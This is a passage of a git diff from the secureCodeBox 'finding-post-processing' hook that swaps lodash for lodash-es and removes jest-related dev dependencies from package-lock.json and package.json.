"1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lodash": { + "node_modules/lodash-es": { "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" - }, - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "requires": { - "yallist": "^3.0.2" - } - }, - "make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "requires": { - "semver": "^6.0.0" - } - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } - }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "requires": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - } - }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "requires": { - "path-key": "^3.0.0" - } - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "requires": { - "wrappy": "1" - } - }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "requires": { - "mimic-fn": "^2.1.0" - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - }, - "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - } - } - }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true - }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - } - }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true - }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - } - }, - "pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } - }, - "pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true - }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true - }, - "resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", - "dev": true, - "requires": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - } - }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - } - }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true - }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "requires": { - "escape-string-regexp": "^2.0.0" - } - }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, - "supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true - }, - "to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "requires": { - "is-number": "^7.0.0" - } - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - }, - "update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "requires": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - } - }, - "v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "requires": { - "isexe": "^2.0.0" - } - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==", + "license": "MIT" + } + }, + "dependencies": { + "lodash-es": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==" } } } diff --git a/hooks/finding-post-processing/hook/package.json b/hooks/finding-post-processing/hook/package.json index 4ca59f2fae..9d7a938e68 100644 --- a/hooks/finding-post-processing/hook/package.json +++ b/hooks/finding-post-processing/hook/package.json @@ -3,9 +3,7 @@ "version": "1.0.0", "description": "secureCodeBox Finding Post Processing Hook", "main": "hook.js", - "scripts": { - "test": "jest --verbose --ci --colors --coverage --passWithNoTests" - }, + "scripts": {}, "repository": { "type": "git", "url": "git+https://github.com/secureCodeBox/secureCodeBox.git" @@ -32,10 +30,8 @@ }, "homepage": "https://www.secureCodeBox.io", "dependencies": { - "lodash": "^4.17.21" + "lodash-es": "^4.17.21" }, "devDependencies": { - "@types/jest": "^29.4.0", - "jest": 